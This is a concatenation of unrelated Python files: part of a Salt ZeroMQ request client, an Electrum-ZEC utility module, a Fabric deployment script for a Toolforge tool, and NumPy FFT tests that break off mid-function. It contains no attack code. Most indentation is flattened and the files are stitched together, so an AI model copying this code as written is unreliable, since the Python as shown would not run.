# Timedout
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
future.set_result(self.serial.loads(msg[0]))
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except: # pylint: disable=W0702
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
            # Hasn't already timed out
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug('SaltReqTimeoutError, retrying. ({0}/{1})'.format(future.attempts, future.tries))
self.send(
message,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, tries=3, future=None, callback=None):
'''
Return a future which will be completed when the message has a response
'''
if future is None:
future = tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
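# Usage sketch (inside a tornado coroutine; the master address is illustrative):
#     client = AsyncReqMessageClient(opts, 'tcp://127.0.0.1:4506', io_loop=io_loop)
#     reply = yield client.send({'cmd': 'ping'}, timeout=5)
# send() serializes the message, queues it, and returns a Future that resolves
# with the deserialized reply, or fails with SaltReqTimeoutError once its
# retries are exhausted.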
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: {0}".format(evt))
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import requests
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
is_bundle = getattr(sys, 'frozen', False)
is_macOS = sys.platform == 'darwin'
base_units = {'ZEC':8, 'mZEC':5, 'uZEC':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Raise this exception to unwind the stack like when an error occurs.
# However, unlike other exceptions, the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
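# Usage sketch (the function name is illustrative):
#
#     @profiler
#     def load_wallet(path):
#         ...
#
# Each call then prints a line like "[profiler] load_wallet 0.0123" via
# print_error() when verbosity is enabled.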
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
    Cast a string to a bytes-like object; for Python 2 support, bytearrays are copied to bytes.
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-zec")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-zec")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-zec")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'Unknown'
x = int(x) # Some callers pass Decimal
    scale_factor = pow(10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
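# Examples (assuming the default 'C' locale decimal point and decimal_point=8):
#     format_satoshis(1234500)                 -> '0.012345'
#     format_satoshis(-1234500)                -> '-0.012345'
#     format_satoshis(1234500, is_diff=True)   -> '+0.012345'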
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
# For raw json, append /insight-api-zcash
mainnet_block_explorers = {
'Explorer.Zcha.in': ('https://explorer.zcha.in/',
{'tx': 'tx', 'addr': 'address'}),
'Zcash.Blockexplorer.com': ('https://zcash.blockexplorer.com/',
{'tx': 'tx', 'addr': 'address'})
}
# TODO zec testnet block explorer
testnet_block_explorers = {
#'Blocktrail.com': ('https://www.blocktrail.com/tBTC',
#{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'})
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('Explorer.Zcha.in', 'Zcash.Blockexplorer.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a Zcash address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid Zcash address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
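# Example (assuming `addr` is accepted by bitcoin.is_address):
#     create_URI(addr, 1234500, 'donation')
#     -> 'bitcoin:<addr>?amount=0.012345&message=donation'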
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
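# Example: messages are newline-delimited JSON, so
#     parse_json(b'{"id": 1}\n{"id": 2}\n')
# returns ({'id': 1}, b'{"id": 2}\n'); the unconsumed remainder is passed back
# in on the next call.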
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def get_cert_path():
if is_bundle and is_macOS:
# set in ./electrum
return requests.utils.DEFAULT_CA_BUNDLE_PATH
return requests.certs.where()
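# --------------------------------------------------------------------------
# Minimal QueuePipe round-trip sketch (illustration only): two pipes wired
# back to back so that whatever one side send()s, the other side get()s.
if __name__ == '__main__':
    _a_to_b = queue.Queue()
    _b_to_a = queue.Queue()
    _side_a = QueuePipe(send_queue=_a_to_b, get_queue=_b_to_a)
    _side_b = QueuePipe(send_queue=_b_to_a, get_queue=_a_to_b)
    _side_a.send({'method': 'ping'})
    print(_side_b.get())  # -> {'method': 'ping'}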
|
fabfile.py
|
# NB: this file requires fabric 3
from __future__ import print_function
import sys
import time
import atexit
import threading
from fabric.api import env, run, sudo, cd, local
env.hosts = ['login.tools.wmflabs.org']
env.sudo_prefix = "sudo -ni -p '%(sudo_prompt)s' "
# TODO
DEFAULT_TOOL = 'montage-dev'
DEFAULT_RELEASE_BRANCH = 'master'
SHELL_POD_NAME = 'interactive' # this'll only change if the webservice command does
TOOL_IMAGE = 'python2' # TODO: py3
# if you hit ctrl-c while ssh'd in, it kills the session, and if you
# were in the middle of pip installing packages, it will leave the
# interactive shell around. so we use atexit to clean up. (also gotta
# clean up stdin termios)
_SHELL_UP = False
old_termios_attrs = None
try:
import termios
import tty
old_termios_attrs = termios.tcgetattr(sys.stdin)
except:
pass
def _shutdown_shell():
try:
if _SHELL_UP:
# host string has to be reset for some unknown reason.
env.host_string = 'login.tools.wmflabs.org'
env.sudo_prefix = "sudo -ni -p '%(sudo_prompt)s' "
sudo('kubectl delete pod %s' % SHELL_POD_NAME)
except SystemExit:
pass
if old_termios_attrs is not None:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_termios_attrs)
return
atexit.register(_shutdown_shell)
def deploy(tool=DEFAULT_TOOL, branch=DEFAULT_RELEASE_BRANCH):
cur_branch = local('git symbolic-ref --short HEAD', capture=True).stdout.strip()
print()
print(' ++ deploying %s to %s' % (branch, tool))
if cur_branch != branch:
print(' -- note that you are on %s' % cur_branch)
time.sleep(3)
print()
res = local('git --no-pager log origin/{0}...{0}'.format(branch), capture=True)
if res.stdout != '':
raise SystemExit(' !! unpushed/unpulled commits on release branch %s,'
' run git push, test, and try again.' % branch)
time.sleep(3)
result = run('whoami')
prefix = run('cat /etc/wmflabs-project').stdout.strip()
username = '%s.%s' % (prefix, tool)
env.sudo_user = username
result = sudo('whoami')
assert result == username
with cd('montage'):
out = sudo('git checkout %s' % branch)
out = sudo('git pull origin %s' % branch)
def _webservice_shell_steps():
global _SHELL_UP
time.sleep(10)
pip_upgrade_cmd = ("kubectl exec " + SHELL_POD_NAME +
" -- www/python/venv/bin/pip install --upgrade -r montage/requirements.txt")
_SHELL_UP = True
out = sudo(pip_upgrade_cmd)
sudo('kubectl delete pod %s' % SHELL_POD_NAME)
_SHELL_UP = False
return
# needed a non-brittle* way of starting up a shell
# pod in the background. so, we background it here, and sleep to
# give time for the pod to come up and get deleted.
#
# *non-brittle = not reimplementing the internals of the
# webservice command
th = threading.Thread(target=_webservice_shell_steps)
th.start()
sudo('webservice %s shell' % TOOL_IMAGE, pty=True)
time.sleep(3)
sudo("webservice %s restart" % TOOL_IMAGE)
# $(kubectl get pods -l name=montage-dev -o jsonpath='{.items[0].metadata.name}')
|
test_pocketfft.py
|
from __future__ import division, absolute_import, print_function
import numpy as np
import pytest
from numpy.random import random
from numpy.testing import (
assert_array_almost_equal, assert_array_equal, assert_raises,
)
import threading
import sys
if sys.version_info[0] >= 3:
import queue
else:
import Queue as queue
def fft1(x):
L = len(x)
phase = -2j*np.pi*(np.arange(L)/float(L))
phase = np.arange(L).reshape(-1, 1) * phase
return np.sum(x*np.exp(phase), axis=1)
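# fft1 above is the O(N^2) direct evaluation of the DFT,
#     X[k] = sum_n x[n] * exp(-2j*pi*k*n / N),
# used as a slow reference implementation to validate np.fft.fft below.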
class TestFFTShift(object):
def test_fft_n(self):
assert_raises(ValueError, np.fft.fft, [1, 2, 3], 0)
class TestFFT1D(object):
def test_identity(self):
maxlen = 512
x = random(maxlen) + 1j*random(maxlen)
xr = random(maxlen)
for i in range(1,maxlen):
assert_array_almost_equal(np.fft.ifft(np.fft.fft(x[0:i])), x[0:i],
decimal=12)
assert_array_almost_equal(np.fft.irfft(np.fft.rfft(xr[0:i]),i),
xr[0:i], decimal=12)
def test_fft(self):
x = random(30) + 1j*random(30)
assert_array_almost_equal(fft1(x), np.fft.fft(x))
assert_array_almost_equal(fft1(x) / np.sqrt(30),
np.fft.fft(x, norm="ortho"))
def test_ifft(self):
x = random(30) + 1j*random(30)
assert_array_almost_equal(x, np.fft.ifft(np.fft.fft(x)))
assert_array_almost_equal(
x, np.fft.ifft(np.fft.fft(x, norm="ortho"), norm="ortho"))
def test_fft2(self):
x = random((30, 20)) + 1j*random((30, 20))
assert_array_almost_equal(np.fft.fft(np.fft.fft(x, axis=1), axis=0),
np.fft.fft2(x))
assert_array_almost_equal(np.fft.fft2(x) / np.sqrt(30 * 20),
np.fft.fft2(x, norm="ortho"))
def test_ifft2(self):
x = random((30, 20)) + 1j*random((30, 20))
assert_array_almost_equal(np.fft.ifft(np.fft.ifft(x, axis=1), axis=0),
np.fft.ifft2(x))
assert_array_almost_equal(np.fft.ifft2(x) * np.sqrt(30 * 20),
np.fft.ifft2(x, norm="ortho"))
def test_fftn(self):
x = random((30, 20, 10)) + 1j*random((30, 20, 10))
assert_array_almost_equal(
np.fft.fft(np.fft.fft(np.fft.fft(x, axis=2), axis=1), axis=0),
np.fft.fftn(x))
assert_array_almost_equal(np.fft.fftn(x) / np.sqrt(30 * 20 * 10),
np.fft.fftn(x, norm="ortho"))
def test_ifftn(self):
x = random((30, 20, 10)) + 1j*random((30, 20, 10))
assert_array_almost_equal(
np.fft.ifft(np.fft.ifft(np.fft.ifft(x, axis=2), axis=1), axis=0),
np.fft.ifftn(x))
assert_array_almost_equal(np.fft.ifftn(x) * np.sqrt(30 * 20 * 10),
np.fft.ifftn(x, norm="ortho"))
def test_rfft(self):
x = random(30)
for n in [x.size, 2*x.size]:
for norm in [None, 'ortho']:
assert_array_almost_equal(
np.fft.fft(x, n=n, norm=norm)[:(n//2 + 1)],
np.fft.rfft(x, n=n, norm=norm))
assert_array_almost_equal(np.fft.rfft(x, n=n) / np.sqrt(n),
np.fft.rfft(x, n=n, norm="ortho"))
def test_irfft(self):
x = random(30)
assert_array_almost_equal(x, np.fft.irfft(np.fft.rfft(x)))
assert_array_almost_equal(
x, np.fft.irfft(np.fft.rfft(x, norm="ortho"), norm="ortho"))
def test_rfft2(self):
x = random((30, 20))
assert_array_almost_equal(np.fft.fft2(x)[:, :11], np.fft.rfft2(x))
assert_array_almost_equal(np.fft.rfft2(x) / np.sqrt(30 * 20),
np.fft.rfft2(x, norm="ortho"))
def test_irfft2(self):
x = random((30, 20))
assert_array_almost_equal(x, np.fft.irfft2(np.fft.rfft2(x)))
assert_array_almost_equal(
x, np.fft.irfft2(np.fft.rfft2(x, norm="ortho"), norm="ortho"))
def test_rfftn(self):
x = random((30, 20, 10))
assert_array_almost_equal(np.fft.fftn(x)[:, :, :6], np.fft.rfftn(x))
assert_array_almost_equal(np.fft.rfftn(x) / np.sqrt(30 * 20 * 10),
np.fft.rfftn(x, norm="ortho"))
def test_irfftn(self):
x = random((30, 20, 10))
assert_array_almost_equal(x, np.fft.irfftn(np.fft.rfftn(x)))
assert_array_almost_equal(
x, np.fft.irfftn(np.fft.rfftn(x, norm="ortho"), norm="ortho"))
def test_hfft(self):
x = random(14) + 1j*random(14)
x_herm = np.concatenate((random(1), x, random(1)))
x = np.concatenate((x_herm, x[::-1].conj()))
assert_array_almost_equal(np.fft.fft(x), np.fft.hfft(x_herm))
assert_array_almost_equal(np.fft.hfft(x_herm) / np.sqrt(30),
np.fft.hfft(x_herm, norm="ortho"))
    def test_ihfft(self):
x = random(14) + 1j*random(14)
x_herm = np.concatenate((random(1), x, random(1)))
x = np.concatenate((x_herm, x[::-1].conj()))
assert_array_almost_equal(x_herm, np.fft.ihfft(np.fft.hfft(x_herm)))
assert_array_almost_equal(
x_herm, np.fft.ihfft(np.fft.hfft(x_herm, norm="ortho"),
norm="ortho"))
@pytest.mark.parametrize("op", [np.fft.fftn, np.fft.ifftn,
np.fft.rfftn, np.fft.irfftn])
def test_axes(self, op):
x = random((30, 20, 10))
axes = [(0, 1, 2), (0, 2, 1), (1, 0, 2), (1, 2, 0), (2, 0, 1), (2, 1, 0)]
for a in axes:
op_tr = op(np.transpose(x, a))
tr_op = np.transpose(op(x, axes=a), a)
assert_array_almost_equal(op_tr, tr_op)
def test_all_1d_norm_preserving(self):
# verify that round-trip transforms are norm-preserving
x = random(30)
x_norm = np.linalg.norm(x)
n = x.size * 2
func_pairs = [(np.fft.fft, np.fft.ifft),
(np.fft.rfft, np.fft.irfft),
# hfft: order so the first function takes x.size samples
# (necessary for comparison to x_norm above)
(np.fft.ihfft, np.fft.hfft),
]
for forw, back in func_pairs:
for n in [x.size, 2*x.size]:
for norm in [None, 'ortho']:
tmp = forw(x, n=n, norm=norm)
tmp = back(tmp, n=n, norm=norm)
assert_array_almost_equal(x_norm,
np.linalg.norm(tmp))
@pytest.mark.parametrize("dtype", [np.half, np.single, np.double,
np.longdouble])
def test_dtypes(self, dtype):
# make sure that all input precisions are accepted and internally
# converted to 64bit
x = random(30).astype(dtype)
assert_array_almost_equal(np.fft.ifft(np.fft.fft(x)), x)
assert_array_almost_equal(np.fft.irfft(np.fft.rfft(x)), x)
@pytest.mark.parametrize(
"dtype",
[np.float32, np.float64, np.complex64, np.complex128])
@pytest.mark.parametrize("order", ["F", 'non-contiguous'])
@pytest.mark.parametrize(
"fft",
[np.fft.fft, np.fft.fft2, np.fft.fftn,
np.fft.ifft, np.fft.ifft2, np.fft.ifftn])
def test_fft_with_order(dtype, order, fft):
# Check that FFT/IFFT produces identical results for C, Fortran and
# non contiguous arrays
rng = np.random.RandomState(42)
X = rng.rand(8, 7, 13).astype(dtype, copy=False)
if order == 'F':
Y = np.asfortranarray(X)
else:
# Make a non contiguous array
Y = X[::-1]
X = np.ascontiguousarray(X[::-1])
if fft.__name__.endswith('fft'):
for axis in range(3):
X_res = fft(X, axis=axis)
Y_res = fft(Y, axis=axis)
